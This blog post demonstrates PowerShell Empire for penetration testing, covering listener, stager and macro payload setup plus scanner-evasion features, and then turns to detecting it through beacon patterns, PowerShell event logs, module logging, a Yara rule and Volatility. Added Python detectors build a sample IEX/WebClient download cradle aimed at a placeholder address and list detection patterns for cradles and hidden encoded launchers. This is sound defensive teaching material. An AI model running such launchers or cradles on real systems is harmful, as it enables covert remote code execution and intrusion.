In my last blog entry I explored some post-exploitation possibilities using PowerShell together with Matt Graeber's repository of penetration testing tools, PowerSploit. PowerSploit, like PowerTools, is a set of fantastic scripts, each capable of accomplishing a siloed task; however, they lack the modularity and pluggability of a complete framework. Today I want to talk about a relatively new entrant to the field: PowerShell Empire.
Although Empire is only a couple of months old, the developers (who also worked on Veil) have built an impressive, lightweight management architecture that borrows heavily from projects like PowerSploit and PowerTools to produce a "pure PowerShell post-exploitation agent built on cryptographically-secure communications and a flexible architecture." While working with it over the past couple of days I have found that it has a familiar workflow for those who are accustomed to Metasploit, making it easy to use for penetration testing Windows environments.
I have used Metasploit for many years, dabbled with Core Impact, and explored Armitage/Cobalt Strike at great length. These are all fantastic frameworks that are incredibly extensible and have strong community support and regular development release cycles. But the PowerSploit framework isn't simply 'built in' to those solutions (Cobalt Strike allows you to import modules, making it perhaps the easiest to extend in terms of PowerShell-based attacks). I've had a few conversations lately with people who are unsure about which framework they should be using, and my response is always the same: it depends. What you choose is largely dependent on financial limitations and objectives, but in the end it is probably best that you get familiar with all of these offerings.
There are a couple of key features in Empire:
- Invoke-Expression and WebClient download cradles allow you to stay off disk as much as possible. Evading on-access scanners is crucial, and leaving as few forensic artifacts as possible is simply good tradecraft.
- The agent beacons in a cryptographically secure manner, and in a way that effectively emulates real command-and-control traffic.
As penetration testers our goal should be to mimic real-world attack methodologies, network traffic and endpoint activity as faithfully as possible, so that we can provide clients with a set of indicators of compromise that can be used to identify monitoring gaps. Tools like Empire help push these ideas forward and reduce the latency between attacker innovation and defender development.
In this post I want to demonstrate how to use Empire, conduct basic IR memory analysis (in the same format as my previous article) and, more importantly, discuss automated detection at the network and host level.
Red Team
I used Kali (2.0) for my server, but I'm sure this would work on most Debian-based distributions.
git clone https://github.com/PowerShellEmpire/Empire.git
cd Empire/setup
./install.sh
Simple. To launch Empire, execute the following command from the Empire root directory with the -debug switch enabled, so that logs are stored for troubleshooting and for tracing your own activity:
./empire -debug
Empire uses the concepts of listeners, stagers and agents. A listener is a network socket instantiated on the server side that manages connections from infected agents. A stager is the payload you deliver to the victim machine to retrieve and start the agent. To access your listeners, type 'listeners' to enter the listeners context, followed by 'info'.
There are a few important values to note here. First, you can specify a KillDate and WorkingHours to limit agent and listener activity based on project constraints. I have certainly worked on a number of engagements in which a client had very specific restrictions about when we could work, and this would have proved invaluable.
Second, the DefaultJitter value will help evade solutions that try to identify malicious beacon patterns that occur at a constant interval and so imply scripted or machine-like activity, which stands out from natural human browsing patterns. There is also a DefaultProfile that defines the communication pattern (request URIs and User-Agent) that the agent uses to beacon home, which we will talk more about later.
Third, define variables using 'set [variablename] [value]' syntax, and activate the listener with the 'execute' command. Type 'list' to verify that the listener is active and a network socket has been opened.
Logically the next step is to define a payload and choose a payload delivery mechanism. Type 'usestager' followed by TAB+TAB to see a list of options.
The two options that are best suited for payload execution are launcher and macro. Launcher will generate a PowerShell one-liner (Base64 encoded or clear text) that automatically sets the required staging key/listener values. Macro creates an Office macro with the appropriate callback values to establish a connection with the listener. This can be embedded in an Office document and used in social engineering attacks as a payload delivery mechanism.
To choose a stager, type 'usestager [stagername] [listenername]' followed by 'execute'.
In the image above you can see that the listener callback details are embedded in the script, and a (possibly) hard-coded value of /index.asp is used for the agent's first GET request. The session value for the agent is included. Base64 encoding the script switches the one-liner to the '-Enc' (-EncodedCommand) PowerShell flag, which takes the Base64 form of the UTF-16LE script text and decodes it at run time. Note that this is encoding, not encryption: it makes investigation and traceability more difficult (again, simulating a real breach), but anyone who captures the command line can decode it.
After executing this one-liner on our victim machine you will receive a callback notification that a new connection has been established. You can find active agents by typing 'agents' followed by 'list'.
Now that a connection is established you can type 'interact [agentname]' to drop into an agent session, similar to meterpreter. Enter 'usemodule' followed by TAB+TAB to see all available options. You can identify privilege escalation opportunities, move laterally, establish persistence, steal tokens/credentials, install key-loggers and run all of the post-exploitation tasks available from the PowerSploit/PowerTools kits. I don't want to go into detail on each of these modules, as that is not the intent of this post. I simply wanted to demonstrate how to get up and running, to encourage more offensive-security professionals to embrace this tool.
Blue Team
My objective for the defensive side of this post is to conduct some high-level analysis of the tool itself and the general methods it employs. There are a lot of modules available, and of course each of these may leave behind specific indicators of attack/compromise, but it is not my goal to go into each of them here.
Let's take a look at some of the network traffic first.
We see that after the initial stager is executed our first connection is established. On its own this is an extremely poor indicator: GET requests to /index.asp are going to be very common on any network. However, it does appear to be a hard-coded value, and it is important to gather as much information as possible.
After this initial connection a second-stage payload is downloaded, key negotiation occurs, an encrypted session is established and the agent starts beaconing. This beacon is characterized by the DefaultProfile variable set for the listener running on the Empire server.
We can see the beacon issue three GET requests within a short period of time during a single call-home interval. The requests are sent to /news.asp, /admin/get.php and /login/process.jsp, and carry a generic Mozilla User-Agent.
Again, individually each of these requests appears benign, and alerting on any one of them would generate a significant number of false positives (which is the intention of the framework). If we look at this traffic collectively, however, we could design a network IDS rule that alerts when a connection is made to /index.asp and is followed by at least three GET requests to at least two of the three profile URIs shown in the image above.
Moreover, many organizations impose tight controls around the type of browser that can be installed, and it is unlikely to see a Windows server with Firefox running. If you are a system administrator who has implemented application white-listing and your users should only be using IE, the presence of a Firefox/Chrome/Opera User-Agent indicates a policy violation (best-case scenario) or a manually crafted UA (worst case, perhaps indicating malware). Keep in mind that IE's own User-Agent string also begins with "Mozilla/", so compare the full string against the ones your approved browsers actually send rather than matching on the prefix. In any event, it is possible to at least use this information to profile other infected hosts, even if it does not serve as the point of initial detection. It's good to have options.
Of course, all of this can be customized in Empire, so from a heuristic perspective I think the important take-away is recognizing the pattern itself (staging request, then periodic bursts of requests to a small fixed set of URIs) and not the specific implementation of that pattern. That is a little esoteric, so let's try to gather more information from the host.
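The two network checks described above, the collective staging-then-beacon rule and the regularity of the call-home interval that DefaultJitter is meant to disguise, as a small detector run over a constructed proxy log. This is an added example, not code from the original post or from the Empire project; the log format, the source IPs, the 60-second interval and the three profile URIs are assumptions made for the example (the URIs mirror the ones seen in the capture above).

```python
"""Beacon-pattern detector for the Empire-style profile discussed above.
Added example, not code from the original post or from Empire. The log
format, the IPs, the profile URIs and the 60 s beacon interval are all
constructed for this example."""
from collections import defaultdict
from datetime import datetime, timedelta
import statistics

STAGING_URI = "/index.asp"                                            # first GET the stager makes
PROFILE_URIS = {"/news.asp", "/admin/get.php", "/login/process.jsp"}  # DefaultProfile URIs
WINDOW = timedelta(minutes=10)     # how long after staging we look for the beacon
BURST_GAP = timedelta(seconds=5)   # requests closer than this are one call-home
UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"


def _burst(src, start):
    """One call-home: the three profile GETs, issued within about a second."""
    t = datetime.fromisoformat(start)
    return [f"{(t + timedelta(seconds=i // 2)).isoformat()} {src} GET {uri} {UA}"
            for i, uri in enumerate(sorted(PROFILE_URIS))]


# Constructed proxy log, one line per request:
#   <ISO timestamp> <src_ip> <method> <uri> <user-agent>
# 10.0.0.5: beacon with DefaultJitter=0 (call-home every 60 s exactly)
# 10.0.0.7: the same beacon with jitter applied
# 10.0.0.9: a user who happens to browse the same site
_lines = [f"2015-09-09T10:00:00 10.0.0.5 GET {STAGING_URI} {UA}"]
for s in ("10:01:00", "10:02:00", "10:03:00", "10:04:00"):
    _lines += _burst("10.0.0.5", f"2015-09-09T{s}")
_lines.append(f"2015-09-09T10:00:00 10.0.0.7 GET {STAGING_URI} {UA}")
for s in ("10:00:50", "10:02:05", "10:02:55", "10:04:10", "10:05:00"):
    _lines += _burst("10.0.0.7", f"2015-09-09T{s}")
_lines += [f"2015-09-09T10:00:00 10.0.0.9 GET {STAGING_URI} {UA}",
           f"2015-09-09T10:00:30 10.0.0.9 GET /news.asp {UA}",
           f"2015-09-09T10:03:00 10.0.0.9 GET /about.html {UA}",
           f"2015-09-09T10:07:00 10.0.0.9 GET /news.asp {UA}"]
SAMPLE_LOG = "\n".join(_lines)


def parse_log(text):
    """Parse the log lines into dicts, sorted by time."""
    records = []
    for line in text.splitlines():
        if line.strip():
            ts, src, method, uri, ua = line.split(maxsplit=4)
            records.append({"time": datetime.fromisoformat(ts), "src": src,
                            "method": method, "uri": uri, "ua": ua})
    return sorted(records, key=lambda r: r["time"])


def staging_followed_by_beacon(records, window=WINDOW, min_requests=3, min_distinct=2):
    """The collective rule from the post: a GET to the staging URI followed,
    within `window`, by at least `min_requests` GETs to at least `min_distinct`
    distinct profile URIs. Returns the matching source IPs."""
    by_src = defaultdict(list)
    for r in records:
        by_src[r["src"]].append(r)
    hits = []
    for src, reqs in by_src.items():
        for i, r in enumerate(reqs):
            if r["method"] != "GET" or r["uri"] != STAGING_URI:
                continue
            later = [x for x in reqs[i + 1:]
                     if x["method"] == "GET" and x["uri"] in PROFILE_URIS
                     and x["time"] - r["time"] <= window]
            if len(later) >= min_requests and len({x["uri"] for x in later}) >= min_distinct:
                hits.append(src)
                break
    return sorted(hits)


def callhome_intervals(records, src, gap=BURST_GAP):
    """Seconds between the starts of successive call-home bursts from `src`."""
    starts = []
    for r in records:
        if r["src"] == src and r["uri"] in PROFILE_URIS:
            if not starts or r["time"] - starts[-1] > gap:
                starts.append(r["time"])
    return [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]


def regularity(intervals):
    """Coefficient of variation of the call-home interval: 0.0 is a perfectly
    periodic beacon, larger values look more like a human. None when there are
    too few call-homes to judge. DefaultJitter is what pushes this value up."""
    if len(intervals) < 3:
        return None
    mean = statistics.mean(intervals)
    return statistics.pstdev(intervals) / mean if mean else None


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("staging followed by beacon:", staging_followed_by_beacon(recs))
    for src in ("10.0.0.5", "10.0.0.7", "10.0.0.9"):
        print(src, "regularity:", regularity(callhome_intervals(recs, src)))
```

Both infected hosts trip the collective rule while the ordinary user does not; the un-jittered agent scores a regularity of exactly 0.0 and the jittered one 0.2, which is the point of the DefaultJitter knob: a threshold on regularity alone is easy to tune around, so it works best as a second signal layered on the URI sequence rather than as a detection by itself.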
Dave recently published a two-part series on Windows event monitoring. This is a fantastic starting point for most organizations, particularly those who are new to SIEM. I still come across a lot of environments that do not have any formal log management program, let alone a properly deployed SIEM with a good alerting framework that has been adequately tuned. For most companies, implementing monitoring for the event IDs Dave highlighted is a good objective. But for those with a more mature security program, I think it's important to start looking at PowerShell events.
PowerShell 2.0 is the version installed by default on Windows 7 and Server 2008 R2 (earlier versions of Windows do not ship with PowerShell installed), and unfortunately it does not provide much information from a logging perspective.
There are primarily two event logs that are accessible:
- Windows PowerShell (the classic log under Applications and Services Logs)
- Microsoft-Windows-PowerShell/Operational
It is also possible to enable the Analytic and Debug logs; however, these are fairly noisy and resource intensive. Open Event Viewer and choose View -> Show Analytic and Debug Logs. Then browse to Applications and Services Logs -> Microsoft -> Windows -> PowerShell and right-click Analytic to enable it. I don't think there is a lot of added value here, but it can be useful when debugging a script or troubleshooting a problem.
In the 2.0 version of the Microsoft-Windows-PowerShell/Operational log you will have the following events of interest:
- 40961 - Console is starting up
- 40962 - Console is ready for user input
These events do contain metadata such as the user who performed the action and the computer it was executed on, but that is about it. If you do not use PowerShell in your environment at all (even small organizations have use cases, so this is unlikely), then alerting on one of these events may be useful, but there is very little contextual information stored in the event to indicate what was done while the console was open.
The classic Windows PowerShell log in version 2.0 of PowerShell will frequently generate these event IDs:
- 600 - Provider Life-cycle
- 400 - Engine Life-cycle
- 403 - Engine Life-cycle
Again these events are fairly nondescript and provide little information. One field is worth a look even on 2.0, though: the HostApplication value in event 400 records the command line that started the engine, so an encoded launcher such as 'powershell -NoP -NonI -W Hidden -Enc ...' shows up there, and hunting for -Enc, -NoP or -W Hidden in that field is a cheap first check.
Event ID 5156 from the Windows Security log (Windows Filtering Platform permitted a connection) can provide some additional information regarding network connections if we filter effectively to alert on outbound, external connections originating from applications like powershell.exe. Be aware that this event is only generated when the "Audit Filtering Platform Connection" subcategory is enabled, and that it is extremely high volume, so it needs aggressive filtering before it reaches a SIEM.
None of these indicators are of substantial quality on their own, but thankfully Microsoft introduced some improvements in version 3.0 of PowerShell. Version 4.0 added nothing further on the logging side; version 5.0 adds script block logging (event 4104) and transcription, which are outside the scope of this post.
After upgrading to PowerShell 3.0 you can enable a GPO setting (Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on Module Logging, backed by the HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging registry key) to turn on module logging for all sessions on all affected computers; set the module list to * to cover every module. Pipeline execution events for the selected modules will then be recorded in the PowerShell event logs I covered earlier. You can also enable these values interactively, as shown in the image below:
If we now execute our PowerShell Empire one-line stager we will have much more event log information to work with. Event IDs 4103 (Microsoft-Windows-PowerShell/Operational) and 800 (Windows PowerShell) are recorded and contain a veritable wealth of information that can be used to find suspicious activity, including the host application command line and the cmdlets invoked.
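Two of the points above, the Base64/UTF-16LE encoding behind the launcher's -Enc switch and the command line and cmdlet names that module logging (event 4103) makes available, combined into one triage routine. This is an added example, not code from the original post or from the Empire project. The download cradle, the TEST-NET callback address and the two event messages are constructed for the example; the event text is shaped like a 4103 module-logging message (CommandInvocation/ParameterBinding lines followed by a Context block with a Host Application field) but is not a captured record.

```python
"""Decode an -EncodedCommand launcher and triage module-logging (4103)
records for download-cradle indicators. Added example, not code from the
original post or from Empire; the script, command lines, event text, host
and URL below are all constructed for this example."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# ones seen in practice. The argument is Base64 of the UTF-16LE script text.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HOSTAPP_RE = re.compile(r"^\s*Host Application = (.+)$", re.M)

# Things a download cradle and a hidden launcher leave behind in the text.
INDICATORS = {
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "webclient": re.compile(r"Net\.WebClient", re.I),
    "download": re.compile(r"Download(?:String|Data|File)", re.I),
    "hidden_window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
    "url": re.compile(r"https?://[^\s'\"]+", re.I),
}


def decode_encoded_command(cmdline):
    """Return the script behind -Enc/-EncodedCommand, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def encode_launcher(script, prefix="powershell -NoP -NonI -W Hidden -Enc"):
    """Build a one-liner shaped like the launcher stager's output (used here
    only to construct sample data)."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"{prefix} {b64}"


def find_indicators(text):
    """Map each indicator name to the first match found in `text`."""
    found = {}
    for name, rx in INDICATORS.items():
        m = rx.search(text)
        if m:
            found[name] = m.group(0)
    return found


def triage_event(message, threshold=2):
    """Triage one 4103 message: take the Host Application command line from
    the Context block, decode any -Enc payload, and score the indicators seen
    across the message, the command line and the decoded script."""
    m = HOSTAPP_RE.search(message)
    cmdline = m.group(1).strip() if m else ""
    decoded = decode_encoded_command(cmdline)
    found = find_indicators("\n".join(s for s in (message, cmdline, decoded) if s))
    return {"command_line": cmdline, "decoded": decoded,
            "indicators": found, "suspicious": len(found) >= threshold}


# Constructed cradle in the style the post describes (WebClient + IEX); the
# host is a TEST-NET address, not a real listener.
CRADLE = ("$wc=New-Object System.Net.WebClient;"
          "$wc.Headers.Add('User-Agent','Mozilla/5.0');"
          "IEX $wc.DownloadString('http://203.0.113.10:8080/index.asp')")
LAUNCHER = encode_launcher(CRADLE)

# Constructed 4103 records shaped like the module-logging message
# (CommandInvocation/ParameterBinding lines, then a Context block).
EVENT_SUSPECT = f"""CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="(second-stage script omitted)"
Context:
        Severity = Informational
        Host Name = ConsoleHost
        Host Version = 3.0
        Host Application = {LAUNCHER}
        Engine Version = 3.0
        Command Name = Invoke-Expression
        Command Type = Cmdlet
        User = CORP\\jdoe
"""
EVENT_BENIGN = """CommandInvocation(Get-ChildItem): "Get-ChildItem"
ParameterBinding(Get-ChildItem): name="Path"; value="C:\\Backups"
Context:
        Severity = Informational
        Host Name = ConsoleHost
        Host Version = 3.0
        Host Application = powershell.exe -File C:\\scripts\\backup.ps1
        Engine Version = 3.0
        Command Name = Get-ChildItem
        Command Type = Cmdlet
        User = CORP\\svc-backup
"""

if __name__ == "__main__":
    for label, ev in (("suspect", EVENT_SUSPECT), ("benign", EVENT_BENIGN)):
        r = triage_event(ev)
        print(label, "suspicious" if r["suspicious"] else "clean", sorted(r["indicators"]))
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

The same decode step applies to the HostApplication field of the 2.0-era event 400 and to the command line recorded by Sysmon or in a memory dump: -Enc hides the script from a casual glance, not from anyone who knows it is Base64 of UTF-16LE. The indicator threshold is deliberately low because a single indicator (a URL, or IEX on its own) is common in legitimate administration scripts; it is the combination of a hidden window, an encoded command and a WebClient download in one record that is hard to explain away.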
At this point we can launch Rekall, list processes, identify suspect network connections, dump process memory and perform keyword string searches.
This is a similar workflow to my prior post. In large memory dumps it can be difficult (and time consuming) to navigate or CTRL+F search through a document for specific keywords. Mark Russinovich's strings can greatly reduce this effort, but a better solution in my opinion is to write Yara rules and use them in conjunction with Volatility. If you aren't familiar with it, Yara is a tool designed to run binary or textual pattern-match searches. Rules are very easy to write, as the syntax is easy to learn. Save the following to a text file with the .yara extension:
rule example : powershell
{
    meta:
        Description = "Look for suspect PowerShell artifacts."
        filetype = "MemoryDump"
        Author = "Greg Carson"
        Date = "09-09-2015"
    strings:
        $s0 = "Invoke-" ascii   // function prefix used throughout PowerSploit/Empire
        $s1 = "-Enc" ascii      // the -EncodedCommand switch from the launcher
    condition:
        2 of them               // with two strings defined, both must be present
}
This can then be used to search the memory of a suspect process (here PID 7860, taken from the earlier process listing) in Volatility. Note that the process command line and most .NET strings live in memory as UTF-16, so adding the wide modifier alongside ascii on both strings will catch more:
vol.py -f image.raw --profile=Win7SP1x64 yarascan -y yarafilename.yara -p 7860
The workflow demonstrated on the Blue Team side isn't necessarily in any particular order. Ideally, you would have a SIEM rule trigger on a suspicious PowerShell pipeline execution event (with appropriate filters and suppression enabled), which results in an investigation of the network traffic shortly before and after the event, followed by a more thorough live memory forensic analysis of the system and of the others it may have had contact with. But this may not be possible depending on the environment you find yourself in. It's important not to rely on any one single security solution, as the indicators of attack will often exist in many different places and across disparate tools that solve different problems.
EDIT:
@tifkin_ contacted me to mention an additional tool from Mark Russinovich called 'Sysmon'. It's a little outside the scope of this post, but the tool itself shows a lot of promise and I'd recommend defenders look into it.